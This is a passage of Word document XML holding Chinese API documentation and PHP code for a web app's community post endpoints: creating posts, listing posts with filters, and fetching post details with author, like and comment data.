    <w:p w14:paraId="4D75C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$data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AA0C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-&gt;setInc('article_num');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB748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 = Db::name('circle')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5176D5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$data['circle_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F676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81D3A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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244CD6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】在您所创建的社区【</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>' . $circle['title'] . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>】发布了新的动态</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C5B2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$circle['member_id'], $content, '', '', $data['circle_id'], $circle_article_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656AD9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311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6A6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532A8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动态创建成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5364F2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A9B0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F0C0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9101D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4A4E6B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该用户社区不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D71AF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4D5577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D7BF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DE4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E94DA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动态创建失败，请稍后重试</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F877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B46C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8E8E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069B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8C9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/api/circle/articles </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得社区动态｜会员动态列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7B16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获得社区动态列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0C6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1405F8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42261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75F27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circle_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指定社区</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填：用于查看某社区动态）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BC0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member_id   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指定会员</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（非必填：用于查看某会员动态）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569135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type_ids     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>指定社区动态分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>IDs</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（多个分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>之间以英文</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分隔）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCEA2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is_top       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否置顶贴：</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否（非必填：值为</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，获得置顶社区动态列表）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613868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is_selected  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是否精华贴：</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否（非必填：值为</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时，获得精华社区动态列表）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1D8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         </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E83F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per_page     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDD53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社区动态列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DD5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total           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>总记录数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348E14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per_page        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每页显示数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C059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current_page    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前页码</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733884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              </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2F2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data.image_urls  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFA49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data.zan_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态获得点赞次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E4B8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data.cai_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态获得点踩次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8BF5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data.ping_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态评论数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236334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data.share_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态分享次数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF0C5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data.is_top    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态是否置顶：</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42C277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data.is_selected </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态是否加精：</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9699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data.author_username      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B33E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data.author_img           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516E9B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data.author_follow_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者关注数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5687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data.author_article_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者发表文章数目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A667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data.zan       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否点赞该动态：</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47DA81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data.follow    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当前用户是否关注该动态作者：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249518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data.pings        </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>前两条评论</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CE45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data.pings.*.author_username  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="325B8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data.pings.*.author_img       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>该评论作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF242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DC9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articles()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5CA8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C84B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$circle_id = input('param.circle_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D096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input('param.member_id', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE132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$type_ids = input('param.type_ids', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3958FD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$is_top = input('param.is_top', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25F1D4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$is_selected = input('param.is_selected', '');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4984B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03691F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6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EB11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Db::name('circle_article');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F00A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($circle_id != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BC58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$articles-&gt;where('circle_id', $circle_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529BF3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E011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 '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE24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$articles-&gt;where('member_id', $member_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D143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0569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($type_ids != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA7FE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$articles-&gt;where('type_id', 'in', $type_ids);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD5FD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705D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($is_top != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CF8B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$articles-&gt;where('is_top', $is_top);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2BC2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E2D7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($is_selected != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358409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$articles-&gt;where('is_selected', $is_selected);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257EAC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B478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$articles-&gt;order('create_time', 'desc')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3171D5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771829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74FCEE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(count($articles['data']) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265512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($articles['data'] as $key =&gt; $article) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B315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$articles['data'][$key]['image_url'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79473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$articles['data'][$key]['image_urls'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CFBBC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 != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207D7D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$articles['data'][$key]['image_url'] = _imgUrl() . $article['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093765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2ECD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($article['images'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778E51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explode(',', $article['images']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D22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($images as $image) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECF3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$articles['data'][$key]['image_urls'][] = _imgUrl() . $image;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DA4C8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A10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A65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$articles['data'][$key]['author_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB5ED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$articles['data'][$key]['author_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017753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$articles['data'][$key]['author_follow_num'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D5E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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F615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$articles['data'][$key]['zan'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55944E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$articles['data'][$key]['follow'] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358305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Db::name('member')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7672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$article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21068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1C3D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_user($article['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2187EA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764DB6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$articles['data'][$key]['author_username'] = $author['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5F7C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$articles['data'][$key]['author_img'] = $author['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503B34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$articles['data'][$key]['author_follow_num'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5CB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225B60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6908E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Db::name('circle_article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C4D7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$article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248FEE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0B726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Db::name('article')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D46D4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$article['member_id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314AD7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F4B60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C37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9D73D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$articles['data'][$key]['zan'] = Db::name('circle_article_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61597B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$article['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D204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53F803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6C97F5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CA31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$articles['data'][$key]['follow'] = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3705F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7A82A3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00BCCD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61705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4DBD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 = Db::name('circle_article_ping')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D638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$article['id'])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D55AA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-&gt;limit(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A81E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509F0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(count($pings) &gt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496E3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($pings as $k =&gt; $ping) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234CA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$pings[$k]['author_username'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE993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$pings[$k]['author_img'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC62E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_user($ping['member_id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ECD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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50640D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$pings[$k]['author_username'] = $member['username'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29624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$pings[$k]['author_img'] = $member['img'] . "?imageView2/1/w/100/h/100";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CF78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4A96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817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372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$articles['data'][$key]['pings'] = $pings;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471D27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91D8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1AA8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json($articles);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB70D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9B3E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B610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/api/circle/article </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>获得社区动态详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619BF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获得社区动态详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37950A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6BCBC7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3C04D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037827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（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A24B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社区动态详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743C4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type_id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态分类</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477B45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{String} title       </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态标题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2BDB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社区动态内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A0FF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description </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>社区动态内容描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6905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image_urls   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多图</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>集合</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770248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author_username      </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者昵称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DAD7D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author_img           </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者头像</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B6BD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author_follow_num   </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者关注数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448BF1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author_article_num  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>动态作者发表文章数目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B5FB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当前用户是否点赞该动态：</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2B74E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当前用户是否关注该动态作者：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DF613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245280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C2034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9104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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3874B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D621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04BDC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7E87B4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732B9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301107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85FB6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FAC9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1777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095D61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5E6B8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F460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1BEE6D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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E6A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3F01D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-&gt;setInc('click');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A09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$article['image_url'] = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6012A6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$article['image_urls'] = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="468A2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 != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E28BD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$article['image_url'] = _imgUrl() . $article['image'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0BE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BF8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($article['images'] != '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC31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explode(',', $article['images']);</w:t>
      </w:r>
    </w:p>
